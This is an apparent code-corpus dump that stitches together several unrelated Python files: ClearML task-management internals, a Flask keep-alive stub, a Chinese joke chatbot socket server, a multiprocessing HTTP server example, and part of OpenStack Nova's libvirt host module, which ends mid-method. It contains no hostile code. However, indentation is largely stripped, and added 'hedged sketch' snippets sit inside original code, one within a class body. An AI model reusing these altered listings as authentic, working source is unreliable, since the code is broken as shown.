only_fields=['id', 'name', 'last_update', system_tags],
**task_filter
)
)
res_tasks = res.response.tasks
# if we have more than one result, filter out the 'archived' results
# notice that if we only have one result we do get the archived one as well.
if len(res_tasks) > 1:
filtered_tasks = [t for t in res_tasks if not getattr(t, system_tags, None) or
cls.archived_tag not in getattr(t, system_tags, None)]
# if we did not filter everything (otherwise we have only archived tasks, so we return them)
if filtered_tasks:
res_tasks = filtered_tasks
task = get_single_result(
entity='task',
query={k: v for k, v in dict(
project_name=project_name, task_name=task_name, tags=tags,
include_archived=include_archived, task_filter=task_filter).items() if v},
results=res_tasks, raise_on_error=False)
if not task:
return None
return cls(
private=cls.__create_protection,
task_id=task.id,
log_to_backend=False,
)
@classmethod
def __get_tasks(
cls,
task_ids=None, # type: Optional[Sequence[str]]
project_name=None, # type: Optional[Union[Sequence[str],str]]
task_name=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> List[Task]
if task_ids:
if isinstance(task_ids, six.string_types):
task_ids = [task_ids]
return [cls(private=cls.__create_protection, task_id=task_id, log_to_backend=False)
for task_id in task_ids]
return [cls(private=cls.__create_protection, task_id=task.id, log_to_backend=False)
for task in cls._query_tasks(project_name=project_name, task_name=task_name, **kwargs)]
@classmethod
def _query_tasks(cls, task_ids=None, project_name=None, task_name=None, **kwargs):
if not task_ids:
task_ids = None
elif isinstance(task_ids, six.string_types):
task_ids = [task_ids]
if project_name and isinstance(project_name, str):
project_names = [project_name]
else:
project_names = project_name
project_ids = []
if project_names:
for name in project_names:
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(
name=exact_match_regex(name)
)
)
project = get_single_result(entity='project', query=name, results=res.response.projects)
if project:
project_ids.append(project.id)
session = cls._get_default_session()
system_tags = 'system_tags' if hasattr(tasks.Task, 'system_tags') else 'tags'
only_fields = ['id', 'name', 'last_update', system_tags]
if kwargs and kwargs.get('only_fields'):
only_fields = list(set(kwargs.pop('only_fields')) | set(only_fields))
res = cls._send(
session,
tasks.GetAllRequest(
id=task_ids,
project=project_ids if project_ids else kwargs.pop('project', None),
name=task_name if task_name else kwargs.pop('name', None),
only_fields=only_fields,
**kwargs
)
)
return res.response.tasks
@classmethod
def __get_hash_key(cls, *args):
def normalize(x):
return "<{}>".format(x) if x is not None else ""
return ":".join(map(normalize, args))
@classmethod
def __get_last_used_task_id(cls, default_project_name, default_task_name, default_task_type):
hash_key = cls.__get_hash_key(
cls._get_api_server(), default_project_name, default_task_name, default_task_type)
# check if we have a cached task_id we can reuse
# it must be from within the last 24h and with the same project/name/type
task_sessions = SessionCache.load_dict(str(cls))
task_data = task_sessions.get(hash_key)
if task_data is None:
return None
try:
task_data['type'] = cls.TaskTypes(task_data['type'])
except (ValueError, KeyError):
LoggerRoot.get_base_logger().warning(
"Corrupted session cache entry: {}. "
"Unsupported task type: {}"
"Creating a new task.".format(hash_key, task_data['type']),
)
return None
return task_data
@classmethod
def __update_last_used_task_id(cls, default_project_name, default_task_name, default_task_type, task_id):
hash_key = cls.__get_hash_key(
cls._get_api_server(), default_project_name, default_task_name, default_task_type)
task_id = str(task_id)
# update task session cache
task_sessions = SessionCache.load_dict(str(cls))
last_task_session = {'time': time.time(), 'project': default_project_name, 'name': default_task_name,
'type': default_task_type, 'id': task_id}
# remove stale sessions
for k in list(task_sessions.keys()):
if ((time.time() - task_sessions[k].get('time', 0)) >
60 * 60 * cls.__task_id_reuse_time_window_in_hours):
task_sessions.pop(k)
# update current session
task_sessions[hash_key] = last_task_session
# store
SessionCache.store_dict(str(cls), task_sessions)
@classmethod
def __task_timed_out(cls, task_data):
return \
task_data and \
task_data.get('id') and \
task_data.get('time') and \
(time.time() - task_data.get('time')) > (60 * 60 * cls.__task_id_reuse_time_window_in_hours)
@classmethod
def __get_task_api_obj(cls, task_id, only_fields=None):
if not task_id or cls._offline_mode:
return None
all_tasks = cls._send(
cls._get_default_session(),
tasks.GetAllRequest(id=[task_id], only_fields=only_fields),
).response.tasks
        # The task may no longer exist (e.g. it was deleted or the environment changed)
if not all_tasks:
return None
return all_tasks[0]
@classmethod
def __task_is_relevant(cls, task_data):
"""
Check that a cached task is relevant for reuse.
A task is relevant for reuse if:
        1. It is not timed out, i.e. it was last used within the previous 24 hours.
        2. Its name, project and type match the data on the server, so as not
            to override user changes made through the UI.
:param task_data: A mapping from 'id', 'name', 'project', 'type' keys
to the task's values, as saved in the cache.
:return: True, if the task is relevant for reuse. False, if not.
"""
if not task_data:
return False
if cls.__task_timed_out(task_data):
return False
task_id = task_data.get('id')
if not task_id:
return False
# noinspection PyBroadException
try:
task = cls.__get_task_api_obj(task_id, ('id', 'name', 'project', 'type'))
except Exception:
task = None
if task is None:
return False
project_name = None
if task.project:
# noinspection PyBroadException
try:
project = cls._send(
cls._get_default_session(),
projects.GetByIdRequest(project=task.project)
).response.project
if project:
project_name = project.name
except Exception:
pass
if task_data.get('type') and \
task_data.get('type') not in (cls.TaskTypes.training, cls.TaskTypes.testing) and \
not Session.check_min_api_version(2.8):
print('WARNING: Changing task type to "{}" : '
'clearml-server does not support task type "{}", '
'please upgrade clearml-server.'.format(cls.TaskTypes.training, task_data['type'].value))
task_data['type'] = cls.TaskTypes.training
compares = (
(task.name, 'name'),
(project_name, 'project'),
(task.type, 'type'),
)
# compare after casting to string to avoid enum instance issues
# remember we might have replaced the api version by now, so enums are different
return all(six.text_type(server_data) == six.text_type(task_data.get(task_data_key))
for server_data, task_data_key in compares)
@classmethod
def __close_timed_out_task(cls, task_data):
if not task_data:
return False
task = cls.__get_task_api_obj(task_data.get('id'), ('id', 'status'))
if task is None:
return False
stopped_statuses = (
str(tasks.TaskStatusEnum.stopped),
str(tasks.TaskStatusEnum.published),
str(tasks.TaskStatusEnum.publishing),
str(tasks.TaskStatusEnum.closed),
str(tasks.TaskStatusEnum.failed),
str(tasks.TaskStatusEnum.completed),
)
if str(task.status) not in stopped_statuses:
cls._send(
cls._get_default_session(),
tasks.StoppedRequest(
task=task.id,
force=True,
status_message="Stopped timed out development task"
),
)
return True
return False
def __getstate__(self):
# type: () -> dict
return {'main': self.is_main_task(), 'id': self.id, 'offline': self.is_offline()}
def __setstate__(self, state):
if state['main'] and not self.__main_task:
Task.__forked_proc_main_pid = None
Task.__update_master_pid_task(task=state['id'])
if state['offline']:
Task.set_offline(offline_mode=state['offline'])
task = Task.init(
continue_last_task=state['id'],
auto_connect_frameworks={'detect_repository': False}) \
if state['main'] else Task.get_task(task_id=state['id'])
self.__dict__ = task.__dict__
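# Hedged, illustrative sketch (not part of the original module): the
# __getstate__/__setstate__ pair above is what allows a Task to survive pickling,
# e.g. when it is handed to a subprocess. The public API names used below
# (Task.init, Task.get_task) appear elsewhere in this file; the project and task
# names are made up for the example.
if __name__ == "__main__":
    import pickle

    def _show_roundtrip(task):
        # Unpickling triggers __setstate__, which re-attaches to the same task id.
        restored = pickle.loads(pickle.dumps(task))
        print("restored task id:", restored.id)

    _show_roundtrip(Task.init(project_name="examples", task_name="pickle-roundtrip"))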
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "By Hama-Kurdsh"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
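# Hedged usage sketch (an assumption about how this module is typically wired in,
# e.g. from a bot's entry point on a free hosting service): calling keep_alive()
# starts the tiny Flask app on port 8080 in a background thread, so an external
# uptime pinger can poll it and keep the host awake while the main program runs.
if __name__ == '__main__':
    keep_alive()
    # The real main program (e.g. bot.run(TOKEN), where TOKEN is hypothetical)
    # would continue here while the Flask thread serves '/' in the background.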
|
Server.py
|
# -*- coding: utf-8 -*-
import socket
import threading
import time
# Corpus of canned replies for the joke chatbot
keywords = {'你是谁': '我是人工智障聊天机器人',
'今天天气如何': '荆州的天气可说不准呢',
'现在几点': '不要逗我了, 你电脑的任务栏上一眼就可以看到时间',
'吃饭了吗': '吃吃吃就知道吃',
'你昨天几点睡的': '真正的强者不需要睡觉',
'阿米娅是兔子还是驴': '是驴',
'我想睡觉': 'Doctor, 您现在还不能休息呢',
'奥尔加团长': '不要停下来啊',
'PHP': 'PHP是世界上最好的语言',
'Python': 'Python可能是世界上最好......学的语言',
'CSS': '天下苦CSS久矣',
'关机': '本人工智障暂时没有执行 shutdown now 的权限',
'于谦三大爱好': '抽烟喝酒烫头',
'相声四门功课': '吃喝抽烫, 脱鞋就唱, 刀枪棍棒, 斧钺钩叉',
}
class Server:
def __init__(self, host: str = '127.0.0.1', port: int = 8000):
        # Create the socket
        # AF_INET selects IPv4; use AF_INET6 for IPv6
        # SOCK_STREAM selects TCP; use SOCK_DGRAM for UDP
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Bind the host and port
        # Bind the (host, port) address to the socket; under AF_INET the address is given as a (host, port) tuple.
self.socket.bind((host, port))
        # Listen on the port
        # The argument is the maximum number of queued connections
self.socket.listen(5)
        # Report the listening address
print('正在监听 ' + host + ':' + str(port))
        # Extra attributes added for the GUI
self.bind_addr = host + ':' + str(port)
self.conn_socket = None
self.addr = None
def chat(self, c, addr):
c.sendall('你好, 人工智障聊天机器人为您服务, 输入 exit 即可退出聊天'.encode('utf-8'))
while True:
try:
data = c.recv(1024).decode('utf-8')
except ConnectionResetError:
c.close()
print(addr, '意外断开\n')
break
if data == 'exit':
c.sendall('exit'.encode('utf-8'))
c.close()
print('与', addr, '结束对话\n')
break
if data == 'force_exit':
c.close()
print('与', addr, '结束对话\n')
break
if data:
print('来自', addr, time.strftime('%Y-%m-%d %H:%M:%S', time.localtime()), '的消息:', data)
if data in keywords:
res = '(命中词库): ' + keywords[data]
c.sendall(res.encode('utf-8'))
print(res)
else:
                    # Parrot mode: echo the message back
res = '(复读机模式): ' + data
print(res)
                    # Manual-reply mode (disabled)
                    # print('Enter a reply: ', end='')
# res = input()
c.sendall(res.encode('utf-8'))
def run(self):
        # Accept connections and receive data
while True:
            # Accept a new connection; this call blocks until a client connects
            # socket.accept() returns (conn, address): conn is a new socket object for sending and receiving data, address is the client's address
c, addr = self.socket.accept()
print('连接地址:', addr)
            # Create a new thread for every connection; otherwise only one client can be served at a time
            t = threading.Thread(target=self.chat, args=(c, addr))
t.start()
if __name__ == '__main__':
server = Server()
server.run()
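# Hedged sketch of a matching client (not part of the original file). It follows the
# protocol implemented in Server.chat() above: plain UTF-8 text in both directions,
# with the literal message 'exit' ending the session. Run it from another process
# while Server() is listening on 127.0.0.1:8000; 'Python' is one of the keys in the
# keywords dict, so it triggers a canned reply rather than the echo path.
def example_client(host='127.0.0.1', port=8000):
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect((host, port))
    print(client.recv(1024).decode('utf-8'))  # greeting sent by Server.chat()
    for msg in ('Python', 'exit'):
        client.sendall(msg.encode('utf-8'))
        reply = client.recv(1024).decode('utf-8')
        print(reply)
        if reply == 'exit':
            break
    client.close()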
|
mp_webserver.py
|
#
# Example where a pool of http servers share a single listening socket
#
# On Windows this module depends on the ability to pickle a socket
# object so that the worker processes can inherit a copy of the server
# object. (We import `multiprocessing.reduction` to enable this pickling.)
#
# Not sure if we should synchronize access to `socket.accept()` method by
# using a process-shared lock -- does not seem to be necessary.
#
# Copyright (c) 2006-2008, R Oudkerk
# All rights reserved.
#
import os
import sys
from multiprocessing import Process, current_process, freeze_support
from http.server import HTTPServer
from http.server import SimpleHTTPRequestHandler
if sys.platform == 'win32':
    import multiprocessing.reduction  # make sockets picklable/inheritable
def note(format, *args):
sys.stderr.write('[%s]\t%s\n' % (current_process().name, format%args))
class RequestHandler(SimpleHTTPRequestHandler):
# we override log_message() to show which process is handling the request
def log_message(self, format, *args):
note(format, *args)
def serve_forever(server):
note('starting server')
try:
server.serve_forever()
except KeyboardInterrupt:
pass
def runpool(address, number_of_processes):
# create a single server object -- children will each inherit a copy
server = HTTPServer(address, RequestHandler)
# create child processes to act as workers
for i in range(number_of_processes-1):
Process(target=serve_forever, args=(server,)).start()
# main process also acts as a worker
serve_forever(server)
def test():
DIR = os.path.join(os.path.dirname(__file__), '..')
ADDRESS = ('localhost', 8000)
NUMBER_OF_PROCESSES = 4
print('Serving at http://%s:%d using %d worker processes' % \
(ADDRESS[0], ADDRESS[1], NUMBER_OF_PROCESSES))
print('To exit press Ctrl-' + ['C', 'Break'][sys.platform=='win32'])
os.chdir(DIR)
runpool(ADDRESS, NUMBER_OF_PROCESSES)
if __name__ == '__main__':
freeze_support()
test()
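# Hedged verification sketch (not part of the original example): with the pool
# running, repeated requests should be answered by different worker processes,
# which shows up in the per-request lines that RequestHandler.log_message() above
# writes to stderr, each tagged with the handling process name.
def example_check(url='http://localhost:8000/', n=8):
    from urllib.request import urlopen
    for _ in range(n):
        urlopen(url).read()  # each fetch appears in the server log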
|
host.py
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Manages information about the host OS and hypervisor.
This class encapsulates a connection to the libvirt
daemon and provides certain higher level APIs around
the raw libvirt API. These APIs are then used by all
the other libvirt related classes
"""
from collections import defaultdict
import operator
import os
import socket
import sys
import threading
import traceback
from eventlet import greenio
from eventlet import greenthread
from eventlet import patcher
from eventlet import tpool
from oslo_log import log as logging
from oslo_utils import encodeutils
from oslo_utils import excutils
from oslo_utils import importutils
from oslo_utils import units
from oslo_utils import versionutils
import six
from nova.compute import utils as compute_utils
import nova.conf
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova import rpc
from nova import utils
from nova.virt import event as virtevent
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import guest as libvirt_guest
from nova.virt.libvirt import utils as libvirt_utils
libvirt = None
LOG = logging.getLogger(__name__)
native_socket = patcher.original('socket')
native_threading = patcher.original("threading")
native_Queue = patcher.original("Queue" if six.PY2 else "queue")
CONF = nova.conf.CONF
# This list is for libvirt hypervisor drivers that need special handling.
# This is *not* the complete list of supported hypervisor drivers.
HV_DRIVER_QEMU = "QEMU"
HV_DRIVER_XEN = "Xen"
SEV_KERNEL_PARAM_FILE = '/sys/module/kvm_amd/parameters/sev'
class Host(object):
def __init__(self, uri, read_only=False,
conn_event_handler=None,
lifecycle_event_handler=None):
global libvirt
if libvirt is None:
libvirt = importutils.import_module('libvirt')
self._uri = uri
self._read_only = read_only
self._initial_connection = True
self._conn_event_handler = conn_event_handler
self._conn_event_handler_queue = six.moves.queue.Queue()
self._lifecycle_event_handler = lifecycle_event_handler
self._caps = None
self._domain_caps = None
self._hostname = None
self._wrapped_conn = None
self._wrapped_conn_lock = threading.Lock()
self._event_queue = None
self._events_delayed = {}
# Note(toabctl): During a reboot of a domain, STOPPED and
# STARTED events are sent. To prevent shutting
# down the domain during a reboot, delay the
# STOPPED lifecycle event some seconds.
self._lifecycle_delay = 15
self._initialized = False
# AMD SEV is conditional on support in the hardware, kernel,
# qemu, and libvirt. This is determined on demand and
# memoized by the supports_amd_sev property below.
self._supports_amd_sev = None
def _native_thread(self):
"""Receives async events coming in from libvirtd.
This is a native thread which runs the default
libvirt event loop implementation. This processes
any incoming async events from libvirtd and queues
them for later dispatch. This thread is only
permitted to use libvirt python APIs, and the
driver.queue_event method. In particular any use
of logging is forbidden, since it will confuse
eventlet's greenthread integration
"""
while True:
libvirt.virEventRunDefaultImpl()
def _dispatch_thread(self):
"""Dispatches async events coming in from libvirtd.
This is a green thread which waits for events to
arrive from the libvirt event loop thread. This
then dispatches the events to the compute manager.
"""
while True:
self._dispatch_events()
def _conn_event_thread(self):
"""Dispatches async connection events"""
# NOTE(mdbooth): This thread doesn't need to jump through the same
# hoops as _dispatch_thread because it doesn't interact directly
# with the libvirt native thread.
while True:
self._dispatch_conn_event()
def _dispatch_conn_event(self):
# NOTE(mdbooth): Splitting out this loop looks redundant, but it
# means we can easily dispatch events synchronously from tests and
# it isn't completely awful.
handler = self._conn_event_handler_queue.get()
try:
handler()
except Exception:
LOG.exception(_('Exception handling connection event'))
finally:
self._conn_event_handler_queue.task_done()
@staticmethod
def _event_lifecycle_callback(conn, dom, event, detail, opaque):
"""Receives lifecycle events from libvirt.
NB: this method is executing in a native thread, not
an eventlet coroutine. It can only invoke other libvirt
APIs, or use self._queue_event(). Any use of logging APIs
in particular is forbidden.
"""
self = opaque
uuid = dom.UUIDString()
transition = None
if event == libvirt.VIR_DOMAIN_EVENT_STOPPED:
transition = virtevent.EVENT_LIFECYCLE_STOPPED
elif event == libvirt.VIR_DOMAIN_EVENT_STARTED:
transition = virtevent.EVENT_LIFECYCLE_STARTED
elif event == libvirt.VIR_DOMAIN_EVENT_SUSPENDED:
if detail == libvirt.VIR_DOMAIN_EVENT_SUSPENDED_POSTCOPY:
transition = virtevent.EVENT_LIFECYCLE_POSTCOPY_STARTED
# FIXME(mriedem): VIR_DOMAIN_EVENT_SUSPENDED_MIGRATED is also sent
# when live migration of the guest fails, so we cannot simply rely
# on the event itself but need to check if the job itself was
# successful.
# elif detail == libvirt.VIR_DOMAIN_EVENT_SUSPENDED_MIGRATED:
# transition = virtevent.EVENT_LIFECYCLE_MIGRATION_COMPLETED
else:
transition = virtevent.EVENT_LIFECYCLE_PAUSED
elif event == libvirt.VIR_DOMAIN_EVENT_RESUMED:
transition = virtevent.EVENT_LIFECYCLE_RESUMED
if transition is not None:
self._queue_event(virtevent.LifecycleEvent(uuid, transition))
def _close_callback(self, conn, reason, opaque):
close_info = {'conn': conn, 'reason': reason}
self._queue_event(close_info)
@staticmethod
def _test_connection(conn):
try:
conn.getLibVersion()
return True
except libvirt.libvirtError as e:
if (e.get_error_code() in (libvirt.VIR_ERR_SYSTEM_ERROR,
libvirt.VIR_ERR_INTERNAL_ERROR) and
e.get_error_domain() in (libvirt.VIR_FROM_REMOTE,
libvirt.VIR_FROM_RPC)):
LOG.debug('Connection to libvirt broke')
return False
raise
@staticmethod
def _connect_auth_cb(creds, opaque):
if len(creds) == 0:
return 0
raise exception.InternalError(
_("Can not handle authentication request for %d credentials")
% len(creds))
@staticmethod
def _connect(uri, read_only):
auth = [[libvirt.VIR_CRED_AUTHNAME,
libvirt.VIR_CRED_ECHOPROMPT,
libvirt.VIR_CRED_REALM,
libvirt.VIR_CRED_PASSPHRASE,
libvirt.VIR_CRED_NOECHOPROMPT,
libvirt.VIR_CRED_EXTERNAL],
Host._connect_auth_cb,
None]
flags = 0
if read_only:
flags = libvirt.VIR_CONNECT_RO
# tpool.proxy_call creates a native thread. Due to limitations
# with eventlet locking we cannot use the logging API inside
# the called function.
return tpool.proxy_call(
(libvirt.virDomain, libvirt.virConnect),
libvirt.openAuth, uri, auth, flags)
def _queue_event(self, event):
"""Puts an event on the queue for dispatch.
This method is called by the native event thread to
put events on the queue for later dispatch by the
green thread. Any use of logging APIs is forbidden.
"""
if self._event_queue is None:
return
# Queue the event...
self._event_queue.put(event)
# ...then wakeup the green thread to dispatch it
c = ' '.encode()
self._event_notify_send.write(c)
self._event_notify_send.flush()
def _dispatch_events(self):
"""Wait for & dispatch events from native thread
Blocks until native thread indicates some events
are ready. Then dispatches all queued events.
"""
# Wait to be notified that there are some
# events pending
try:
_c = self._event_notify_recv.read(1)
assert _c
except ValueError:
return # will be raised when pipe is closed
# Process as many events as possible without
# blocking
last_close_event = None
while not self._event_queue.empty():
try:
event = self._event_queue.get(block=False)
if isinstance(event, virtevent.LifecycleEvent):
# call possibly with delay
self._event_emit_delayed(event)
elif 'conn' in event and 'reason' in event:
last_close_event = event
except native_Queue.Empty:
pass
if last_close_event is None:
return
conn = last_close_event['conn']
# get_new_connection may already have disabled the host,
# in which case _wrapped_conn is None.
with self._wrapped_conn_lock:
if conn == self._wrapped_conn:
reason = str(last_close_event['reason'])
msg = _("Connection to libvirt lost: %s") % reason
self._wrapped_conn = None
self._queue_conn_event_handler(False, msg)
def _event_emit_delayed(self, event):
"""Emit events - possibly delayed."""
def event_cleanup(gt, *args, **kwargs):
"""Callback function for greenthread. Called
to cleanup the _events_delayed dictionary when an event
was called.
"""
event = args[0]
self._events_delayed.pop(event.uuid, None)
# Cleanup possible delayed stop events.
if event.uuid in self._events_delayed.keys():
self._events_delayed[event.uuid].cancel()
self._events_delayed.pop(event.uuid, None)
LOG.debug("Removed pending event for %s due to "
"lifecycle event", event.uuid)
if event.transition == virtevent.EVENT_LIFECYCLE_STOPPED:
# Delay STOPPED event, as they may be followed by a STARTED
# event in case the instance is rebooting
id_ = greenthread.spawn_after(self._lifecycle_delay,
self._event_emit, event)
self._events_delayed[event.uuid] = id_
# add callback to cleanup self._events_delayed dict after
# event was called
id_.link(event_cleanup, event)
else:
self._event_emit(event)
def _event_emit(self, event):
if self._lifecycle_event_handler is not None:
self._lifecycle_event_handler(event)
def _init_events_pipe(self):
"""Create a self-pipe for the native thread to synchronize on.
This code is taken from the eventlet tpool module, under terms
of the Apache License v2.0.
"""
self._event_queue = native_Queue.Queue()
try:
rpipe, wpipe = os.pipe()
self._event_notify_send = greenio.GreenPipe(wpipe, 'wb', 0)
self._event_notify_recv = greenio.GreenPipe(rpipe, 'rb', 0)
except (ImportError, NotImplementedError):
# This is Windows compatibility -- use a socket instead
# of a pipe because pipes don't really exist on Windows.
sock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', 0))
sock.listen(50)
csock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
csock.connect(('localhost', sock.getsockname()[1]))
nsock, addr = sock.accept()
self._event_notify_send = nsock.makefile('wb', 0)
gsock = greenio.GreenSocket(csock)
self._event_notify_recv = gsock.makefile('rb', 0)
def _init_events(self):
"""Initializes the libvirt events subsystem.
This requires running a native thread to provide the
libvirt event loop integration. This forwards events
to a green thread which does the actual dispatching.
"""
self._init_events_pipe()
LOG.debug("Starting native event thread")
self._event_thread = native_threading.Thread(
target=self._native_thread)
        self._event_thread.daemon = True
self._event_thread.start()
LOG.debug("Starting green dispatch thread")
utils.spawn(self._dispatch_thread)
def _get_new_connection(self):
# call with _wrapped_conn_lock held
LOG.debug('Connecting to libvirt: %s', self._uri)
# This will raise an exception on failure
wrapped_conn = self._connect(self._uri, self._read_only)
try:
LOG.debug("Registering for lifecycle events %s", self)
wrapped_conn.domainEventRegisterAny(
None,
libvirt.VIR_DOMAIN_EVENT_ID_LIFECYCLE,
self._event_lifecycle_callback,
self)
except Exception as e:
LOG.warning("URI %(uri)s does not support events: %(error)s",
{'uri': self._uri, 'error': e})
try:
LOG.debug("Registering for connection events: %s", str(self))
wrapped_conn.registerCloseCallback(self._close_callback, None)
except libvirt.libvirtError as e:
LOG.warning("URI %(uri)s does not support connection"
" events: %(error)s",
{'uri': self._uri, 'error': e})
return wrapped_conn
def _queue_conn_event_handler(self, *args, **kwargs):
if self._conn_event_handler is None:
return
def handler():
return self._conn_event_handler(*args, **kwargs)
self._conn_event_handler_queue.put(handler)
def _get_connection(self):
# multiple concurrent connections are protected by _wrapped_conn_lock
with self._wrapped_conn_lock:
# Drop the existing connection if it is not usable
if (self._wrapped_conn is not None and
not self._test_connection(self._wrapped_conn)):
self._wrapped_conn = None
# Connection was previously up, and went down
self._queue_conn_event_handler(
False, _('Connection to libvirt lost'))
if self._wrapped_conn is None:
try:
# This will raise if it fails to get a connection
self._wrapped_conn = self._get_new_connection()
except Exception as ex:
with excutils.save_and_reraise_exception():
# If we previously had a connection and it went down,
# we generated a down event for that above.
# We also want to generate a down event for an initial
# failure, which won't be handled above.
if self._initial_connection:
self._queue_conn_event_handler(
False,
_('Failed to connect to libvirt: %(msg)s') %
{'msg': ex})
finally:
self._initial_connection = False
self._queue_conn_event_handler(True, None)
return self._wrapped_conn
def get_connection(self):
"""Returns a connection to the hypervisor
This method should be used to create and return a well
configured connection to the hypervisor.
:returns: a libvirt.virConnect object
"""
try:
conn = self._get_connection()
except libvirt.libvirtError as ex:
LOG.exception(_("Connection to libvirt failed: %s"), ex)
payload = dict(ip=CONF.my_ip,
method='_connect',
reason=ex)
ctxt = nova_context.get_admin_context()
rpc.get_notifier('compute').error(ctxt,
'compute.libvirt.error',
payload)
compute_utils.notify_about_libvirt_connect_error(
ctxt, ip=CONF.my_ip, exception=ex, tb=traceback.format_exc())
raise exception.HypervisorUnavailable(host=CONF.host)
return conn
@staticmethod
def _libvirt_error_handler(context, err):
# Just ignore instead of default outputting to stderr.
pass
def initialize(self):
if self._initialized:
return
# NOTE(dkliban): Error handler needs to be registered before libvirt
# connection is used for the first time. Otherwise, the
# handler does not get registered.
libvirt.registerErrorHandler(self._libvirt_error_handler, None)
libvirt.virEventRegisterDefaultImpl()
self._init_events()
LOG.debug("Starting connection event dispatch thread")
utils.spawn(self._conn_event_thread)
self._initialized = True
def _version_check(self, lv_ver=None, hv_ver=None, hv_type=None,
op=operator.lt):
"""Check libvirt version, hypervisor version, and hypervisor type
:param hv_type: hypervisor driver from the top of this file.
"""
conn = self.get_connection()
try:
if lv_ver is not None:
libvirt_version = conn.getLibVersion()
if op(libvirt_version,
versionutils.convert_version_to_int(lv_ver)):
return False
if hv_ver is not None:
hypervisor_version = conn.getVersion()
if op(hypervisor_version,
versionutils.convert_version_to_int(hv_ver)):
return False
if hv_type is not None:
hypervisor_type = conn.getType()
if hypervisor_type != hv_type:
return False
return True
except Exception:
return False
def has_min_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.lt)
def has_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.ne)
def get_guest(self, instance):
"""Retrieve libvirt guest object for an instance.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
:param instance: a nova.objects.Instance object
:returns: a nova.virt.libvirt.Guest object
:raises exception.InstanceNotFound: The domain was not found
:raises exception.InternalError: A libvirt error occurred
"""
return libvirt_guest.Guest(self._get_domain(instance))
def _get_domain(self, instance):
"""Retrieve libvirt domain object for an instance.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
:param instance: a nova.objects.Instance object
:returns: a libvirt.Domain object
:raises exception.InstanceNotFound: The domain was not found
:raises exception.InternalError: A libvirt error occurred
"""
try:
conn = self.get_connection()
return conn.lookupByUUIDString(instance.uuid)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance.uuid)
msg = (_('Error from libvirt while looking up %(instance_name)s: '
'[Error Code %(error_code)s] %(ex)s') %
{'instance_name': instance.name,
'error_code': error_code,
'ex': ex})
raise exception.InternalError(msg)
def list_guests(self, only_running=True, only_guests=True):
"""Get a list of Guest objects for nova instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
See method "list_instance_domains" for more information.
:returns: list of Guest objects
"""
return [libvirt_guest.Guest(dom) for dom in self.list_instance_domains(
only_running=only_running, only_guests=only_guests)]
def list_instance_domains(self, only_running=True, only_guests=True):
"""Get a list of libvirt.Domain objects for nova instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
Query libvirt to a get a list of all libvirt.Domain objects
that correspond to nova instances. If the only_running parameter
is true this list will only include active domains, otherwise
inactive domains will be included too. If the only_guests parameter
is true the list will have any "host" domain (aka Xen Domain-0)
filtered out.
:returns: list of libvirt.Domain objects
"""
flags = libvirt.VIR_CONNECT_LIST_DOMAINS_ACTIVE
if not only_running:
flags = flags | libvirt.VIR_CONNECT_LIST_DOMAINS_INACTIVE
alldoms = self.get_connection().listAllDomains(flags)
doms = []
for dom in alldoms:
if only_guests and dom.ID() == 0:
continue
doms.append(dom)
return doms
def get_online_cpus(self):
"""Get the set of CPUs that are online on the host
Method is only used by NUMA code paths which check on
libvirt version >= 1.0.4. getCPUMap() was introduced in
libvirt 1.0.0.
:returns: set of online CPUs, raises libvirtError on error
"""
(cpus, cpu_map, online) = self.get_connection().getCPUMap()
online_cpus = set()
for cpu in range(cpus):
if cpu_map[cpu]:
online_cpus.add(cpu)
return online_cpus
def get_cpu_model_names(self):
"""Get the cpu models based on host CPU arch
:returns: a list of cpu models which supported by the given CPU arch
"""
arch = self.get_capabilities().host.cpu.arch
return self.get_connection().getCPUModelNames(arch)
@staticmethod
def _log_host_capabilities(xmlstr):
# NOTE(mriedem): This looks a bit weird but we do this so we can stub
# out this method in unit/functional test runs since the xml string is
# big and it can cause subunit parsing to fail (see bug 1813147).
LOG.info("Libvirt host capabilities %s", xmlstr)
def get_capabilities(self):
"""Returns the host capabilities information
Returns an instance of config.LibvirtConfigCaps representing
the capabilities of the host.
Note: The result is cached in the member attribute _caps.
:returns: a config.LibvirtConfigCaps object
"""
if not self._caps:
xmlstr = self.get_connection().getCapabilities()
self._log_host_capabilities(xmlstr)
self._caps = vconfig.LibvirtConfigCaps()
self._caps.parse_str(xmlstr)
# NOTE(mriedem): Don't attempt to get baseline CPU features
# if libvirt can't determine the host cpu model.
if (hasattr(libvirt,
'VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES') and
self._caps.host.cpu.model is not None):
try:
xml_str = self._caps.host.cpu.to_xml()
